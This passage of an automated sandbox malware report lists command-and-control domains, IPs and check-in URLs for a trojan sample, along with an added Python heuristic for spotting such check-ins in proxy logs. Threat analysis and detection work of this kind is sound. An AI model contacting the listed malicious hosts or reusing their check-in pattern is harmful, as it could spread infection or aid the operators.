http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== | 0% | Avira URL Cloud | safe
http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.13.255.157 | true | false | | high
hotlightexpens.fun | 52.206.71.220 | true | true | | unknown
www.betbonusuk.com | 104.21.7.67 | true | true | | unknown
loktantratvnews.com | 148.66.136.150 | true | true | | unknown
www.getboostphlo.com | 172.67.219.254 | true | false | | unknown
www.moretuantired.com | 81.17.18.198 | true | true | | unknown
www.weluvweb.com | 52.56.126.26 | true | true | | unknown
www.ux300e.com | 52.58.78.16 | true | true | | unknown
emmajanetracy.com | 192.0.78.25 | true | true | | unknown
www.okitmall.com | 15.165.26.252 | true | true | | unknown
www.theartsutra.com | 142.111.76.118 | true | true | | unknown
www.chestfreezersale.xyz | 172.67.130.43 | true | true | | unknown
www.loktantratvnews.com | unknown | unknown | true | | unknown
www.appearwood.club | unknown | unknown | true | | unknown
www.warungjitu.com | unknown | unknown | true | | unknown
www.rosewoodcibubur.com | unknown | unknown | true | | unknown
www.omxpro.com | unknown | unknown | true | | unknown
www.peridot.website | unknown | unknown | true | | unknown
www.emmajanetracy.com | unknown | unknown | true | | unknown

                                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.okitmall.com/iu4d/ | true | Avira URL Cloud: safe | low
http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== | true | Avira URL Cloud: safe | unknown
http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== | true | Avira URL Cloud: safe | unknown
http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp | true | Avira URL Cloud: safe | unknown
http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== | true | Avira URL Cloud: safe | unknown
http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp | true | Avira URL Cloud: safe | unknown
http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== | true | Avira URL Cloud: safe | unknown
http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp | true | Avira URL Cloud: safe | unknown
http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== | true | Avira URL Cloud: safe | unknown
http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== | true | Avira URL Cloud: safe | unknown

                                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | s6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                  Contacted IPs


                                                                  Public

IP               Domain                                                      Country        ASN    ASN name         Malicious
104.21.7.67      www.betbonusuk.com                                          United States  13335  CLOUDFLARENETUS  true
192.0.78.25      emmajanetracy.com                                           United States  2635   AUTOMATTICUS     true
142.111.76.118   www.theartsutra.com                                         United States  18779  EGIHOSTINGUS     true
15.165.26.252    www.okitmall.com                                            United States  16509  AMAZON-02US      true
172.67.130.43    www.chestfreezersale.xyz                                    United States  13335  CLOUDFLARENETUS  true
81.17.18.198     www.moretuantired.com                                       Switzerland    51852  PLI-ASCH         true
52.206.71.220    hotlightexpens.fun                                          United States  14618  AMAZON-AESUS     true
52.56.126.26     www.weluvweb.com                                            United States  16509  AMAZON-02US      true
3.13.255.157     prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com   United States  16509  AMAZON-02US      false

                                                                  General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385308
Start date: 12.04.2021
Start time: 10:01:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 40s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: s6G3ZtvHZg.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@16/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.7% (good quality ratio 8.6%)
• Quality average: 73.3%
• Quality standard deviation: 32.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 78
• Number of non-executed functions: 154
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 92.122.145.220, 184.30.24.56, 168.61.161.212, 13.88.21.125, 20.82.209.183, 13.64.90.137, 92.122.213.194, 92.122.213.247, 2.16.218.147, 2.16.218.169, 104.42.151.234, 172.67.202.111, 104.21.90.158, 104.43.193.48, 52.155.217.156, 20.54.26.129, 104.43.139.144, 52.255.188.83
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www.omxpro.com.cdn.cloudflare.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

Time      Type             Description
10:02:33  API Interceptor  1x Sleep call for process: s6G3ZtvHZg.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

Match: IP, followed by the associated sample name, its detection and the URL context in which the same IP was seen.

104.21.7.67
  AAXIFJn78w.exe (malicious): www.betbonusuk.com/iu4d/?ETF8=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUHFSVt0xyq&URiPe=00DP1LExV2xHZfdP
  fNiff08dxi.exe (malicious): www.betbonusuk.com/iu4d/?GFNDG=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUtailtwz6q&EHL0Sj=UvS0
192.0.78.25
  g2qwgG2xbe.exe (malicious): www.micheldrake.com/p2io/?Ezut_6Ph=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&lhuLO=TxllZ2B
  12042021493876783,xlsx.exe (malicious): www.thevillaflora.com/hw6d/?NTxxLxi=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHwnLMWYR763luo+iQ==&Cj9LK=9rjlL0C
  Customer-100912288113.xlsx (malicious): www.micheldrake.com/p2io/?YPxxw=JxlLiTVHLV_&4h=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
  vbc.exe (malicious): www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK
  RFQ-V-SAM-0321D056-DOC.exe (malicious): www.619savage.store/uwec/?CZ6=7nExZbW&v2=UXtrAnkUbxIt7Da+co89vc/yvelnirGGdixyijtvmiG0dXcVjZHX+cHMX+KvBOjcxYq/
  yQh96Jd6TZ.exe (malicious): www.longdoggy.net/vu9b/?OV0xlV=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZtS/Pp2iNH&wh=jL0xYFb0mbwHi
  g0g865fQ2S.exe (malicious): www.micheldrake.com/p2io/?4h3=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&vTapK=LJBpc8p
  Original Invoice-COAU7230734290.xlsx (malicious): www.mels.ink/jzvu/?Cfw=iJYv1UkrTzZtiuEKuxHty87S2Dat4Pv7WpvfTrmOLEk2tcdYje0Px5XPsXKXm5aj0GbIDQ==&QDHH=nN980P
  RMwfvA9kZy.exe (malicious): www.regalparkllc.com/nnmd/?c2Mh-=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK&tVm4=J690I
  ZwNJI24QAf.exe (malicious): www.micheldrake.com/p2io/?8p=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1Y8u0zs/SS1CQHpw==&ChOh3=H0Gdhfb
  loMStbzHSP.exe (malicious): www.micheldrake.com/p2io/?sZvD8l=Spap-DKpf&7nEpiRy=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==
  CVE9362.exe (malicious): www.colorblindwork.com/ksb/?ofuxZr=dWIaQL0PIzW1akyTL8Rl6DSxnESZDNu4upVzjJTzlVvTtXgXRqzkSDdoiRY4N8qhYGfg&1bg=onMPeNox4PLhS
  SWIFT COPY_PDF.exe (malicious): www.michaelroberts.gallery/m2be/?Et5pFP9=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaClCICcsINp3OOFeDA==&uDKLJ=D48t
  MV Sky Marine_pdf.exe (malicious): www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW
  NEW ORDER_PDF.exe (malicious): www.mamaoutloud.com/s8ri/?bl=UTChTb0hUjYl5Vd&Y2JpVVJ=u9elXLp277xnqVcwAnLNhuW6l0GYaPGhHfcVWexw3ERwjVjzs8/RHD/51sUEjByU9HeW
  32ciKQsy2X.exe (malicious): www.earth-emily.com/4qdc/?AR-XJ2=Wph7KmTxuM3Gsk6JJA1oy52G3sDFb69RyaiHg2D5Z4a2zIwRuNgDhRaz3sbfTzDvPg+4&et-=XPJxZ2SpixNTl6pp
  Fym9exdpg8.exe (malicious): www.espressoandhoney.com/gts/?9rkdzNqh=EzY5lfbdKr94xDCu9UGw63kyV4asBdh+DU/WNzhiAESrVolwAii5R+YbRjGRKuu5f9CU/7tXGg==&FR-8RX=3fCpm
  PO_210316.exe.exe (malicious): www.ga-don.com/ntg/?tXUp=YP7DfZXHo&p0D=WOLsrCKcrV537zGLK3AUh+BiQyTRpI49VOz5B2TFxvfb2Jntw5H/Y3VWDNX0TqmXK6eo
  pVXFB33FzO.exe (malicious): www.leadeligey.com/bw82/?VR-T8=l6AlF0u814LH_Lj&BRAh4F=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ
  EuDXqof7Tf.exe (malicious): www.thehumboldtlife.com/smd0/?FPWlMXl=d6QrSWppnHOFtnwEPnVYTCwaC4pvPTP/peW/DzgbzQLmUmVOVerI/d+4OTFHCaVj4q0+&AlB=O2JtVnHxm
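Every check-in URL listed against these two IPs has the same shape: a "www." host, one short alphanumeric path segment, and exactly two query parameters of which one carries a long base64-like blob and the other a short token. The following is an added example, not Joe Sandbox's detection logic and not the Snort rule the report refers to: a heuristic matcher for that shape, run over constructed proxy log lines. The shape constraints (3-4 character path segment, blob of at least 48 base64 characters, token of at most 20 characters) are an assumption distilled from the URLs printed above, and the log format, timestamps, client address and process names are invented for the example.

```python
import re
from urllib.parse import urlsplit

# Shape constraints distilled from the check-in URLs printed in this report.
# This is an assumption for the example, not a published FormBook signature:
#   - host begins with "www."
#   - a single 3-4 character alphanumeric path segment with a trailing slash
#   - exactly two query parameters: one long base64-like blob, one short token
PATH_RE = re.compile(r"^/[A-Za-z0-9]{3,4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9_-]+$")
LONG_VALUE_RE = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")
SHORT_VALUE_RE = re.compile(r"^[A-Za-z0-9_-]{1,20}$")


def split_query(query):
    """Split a raw query string into (key, value) pairs without decoding.

    urllib.parse.parse_qsl would turn '+' into a space and percent-decode,
    which would break the base64 alphabet check, so the split is done by hand.
    """
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def looks_like_formbook_checkin(url):
    """Return True when url matches the heuristic shape described above."""
    if "://" not in url:
        url = "http://" + url          # the report prints URLs without a scheme
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host.startswith("www.") or not PATH_RE.match(parts.path):
        return False
    pairs = split_query(parts.query)
    if len(pairs) != 2 or not all(KEY_RE.match(k) for k, _ in pairs):
        return False
    values = [v for _, v in pairs]
    # One long blob and one short token, in either order (both orders occur above).
    return (sum(bool(LONG_VALUE_RE.match(v)) for v in values) == 1
            and sum(bool(SHORT_VALUE_RE.match(v)) for v in values) == 1)


# Constructed proxy log lines for the example. The two check-in URLs are
# copied from the context table above; everything else on each line is invented.
SAMPLE_PROXY_LOG = [
    "2021-04-12T10:03:01Z 10.0.0.5 explorer.exe GET http://www.betbonusuk.com/iu4d/?ETF8=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUHFSVt0xyq&URiPe=00DP1LExV2xHZfdP 404",
    "2021-04-12T10:03:05Z 10.0.0.5 chrome.exe GET http://www.bing.com/search?q=formbook 200",
    "2021-04-12T10:03:09Z 10.0.0.5 explorer.exe GET http://www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK 200",
    "2021-04-12T10:03:12Z 10.0.0.5 svchost.exe CONNECT fs.microsoft.com:443 200",
]


def scan_proxy_log(lines):
    """Return (timestamp, process, url) for every line whose URL matches.

    Assumes the constructed layout above: timestamp, client, process, method,
    target, status, separated by whitespace.
    """
    hits = []
    for line in lines:
        fields = line.split()
        for field in fields:
            if field.startswith(("http://", "https://")) and looks_like_formbook_checkin(field):
                hits.append((fields[0], fields[2], field))
    return hits


if __name__ == "__main__":
    for ts, proc, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(ts, proc, url)
```

The process column matters as much as the URL: in this analysis the check-ins are made from explorer.exe after injection (see the "System process connects to network" signature), so a hit attributed to a system binary is a stronger indicator than the URL shape alone. Treat the matcher as a triage filter, not a verdict; a legitimate site can produce a URL of this shape.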

                                                                  Domains

Match: domain, followed by the associated sample name, its detection and the IP the domain resolved to in that analysis.

prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
  g2qwgG2xbe.exe (malicious): 52.15.160.167
  winlog.exe (malicious): 3.14.206.30
  1ucvVfbHnD.exe (malicious): 3.13.255.157
  Wire Transfer Update.exe (malicious): 3.13.255.157
  LtfVNumoON.exe (malicious): 52.15.160.167
  giATspz5dw.exe (malicious): 52.15.160.167
  Customer-100912288113.xlsx (malicious): 52.15.160.167
  New order.exe (malicious): 3.14.206.30
  qRsvaKcvxZ.exe (malicious): 3.14.206.30
  PO-RFQ # 097663899 pdf .exe (malicious): 52.15.160.167
  PO45937008ADENGY.exe (malicious): 52.15.160.167
  Calt7BoW2a.exe (malicious): 3.14.206.30
  TazxfJHRhq.exe (malicious): 52.15.160.167
  8sxgohtHjM.exe (malicious): 3.13.255.157
  vbc.exe (malicious): 3.13.255.157
  Order Inquiry.exe (malicious): 3.14.206.30
  PaymentAdvice.exe (malicious): 3.14.206.30
  BL01345678053567.exe (malicious): 3.14.206.30
  Shipping Documents.xlsx (malicious): 3.14.206.30
  TACA20210407.PDF.exe (malicious): 3.13.255.157
www.moretuantired.com
  MV WAF PASSION.exe (malicious): 81.17.18.198
www.betbonusuk.com
  hvEop8Y70Y.exe (malicious): 172.67.187.138
  AAXIFJn78w.exe (malicious): 104.21.7.67
  vfe1GoeC5F.exe (malicious): 172.67.187.138
  fNiff08dxi.exe (malicious): 104.21.7.67
hotlightexpens.fun
  MV WAF PASSION.exe (malicious): 52.86.219.129
  AAXIFJn78w.exe (malicious): 34.196.151.230
  Feb SOA.xlsx (malicious): 54.144.3.29
  IMG001.exe (malicious): 52.206.71.220
www.getboostphlo.com
  hvEop8Y70Y.exe (malicious): 172.67.219.254

                                                                  ASN

Match: ASN name, followed by the associated sample name, its detection and the IP in that ASN the sample contacted.

AUTOMATTICUS
  g2qwgG2xbe.exe (malicious): 192.0.78.25
  12042021493876783,xlsx.exe (malicious): 192.0.78.25
  winlog.exe (malicious): 192.0.78.231
  Customer-100912288113.xlsx (malicious): 192.0.78.25
  Purchase Order.xlsx (malicious): 192.0.78.172
  HG546092227865431209.exe (malicious): 192.0.78.24
  invoice.exe (malicious): 192.0.78.24
  0BAdCQQVtP.exe (malicious): 192.0.78.175
  vbc.exe (malicious): 192.0.78.25
  o2KKHvtb3c.exe (malicious): 192.0.78.24
  PO#41000055885.exe (malicious): 192.0.78.24
  BL836477488575.exe (malicious): 192.0.78.194
  FARASIS.xlsx (malicious): 192.0.79.33
  FARASIS.xlsx (malicious): 192.0.79.32
  RFQ-V-SAM-0321D056-DOC.exe (malicious): 192.0.78.25
  swift_76567643.exe (malicious): 192.0.78.24
  PDF NEW P.OJerhWEMSj4RnE4Z.exe (malicious): 192.0.78.24
  yQh96Jd6TZ.exe (malicious): 192.0.78.25
  Swift.exe (malicious): 192.0.78.24
  TNUiVpymgH.exe (malicious): 192.0.78.24
CLOUDFLARENETUS
  4oItdZkNOZ.exe (malicious): 23.227.38.74
  ieuHgdpuPo.exe (malicious): 104.21.17.57
  Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exe (malicious): 172.67.222.176
  Payment Slip.doc (malicious): 104.21.17.57
  Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exe (malicious): 104.21.17.57
  INQUIRY 1820521 pdf.exe (malicious): 104.21.82.58
  PaymentCopy.vbs (malicious): 172.67.222.131
  PAYMENT COPY.exe (malicious): 104.21.28.135
  PO NUMBER 3120386 3120393 SIGNED.exe (malicious): 1.2.3.4
  Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe (malicious): 172.67.222.176
  BL2659618800638119374.xls.exe (malicious): 172.67.222.176
  Purchase order and quote confirmation.exe (malicious): 172.67.222.176
  Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe (malicious): 172.67.188.154
  Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe (malicious): 104.21.17.57
  SOA.exe (malicious): 104.21.19.200
  RFQ No A'4762GHTECHNICAL DETAILS.exe (malicious): 104.21.19.200
  GQ5JvPEI6c.exe (malicious): 104.21.17.57
  setupapp.exe (malicious): 172.67.164.1
  g2qwgG2xbe.exe (malicious): 172.67.161.4
  C++ Dropper.exe (malicious): 104.21.50.92

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.log
Process: C:\Users\user\Desktop\s6G3ZtvHZg.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
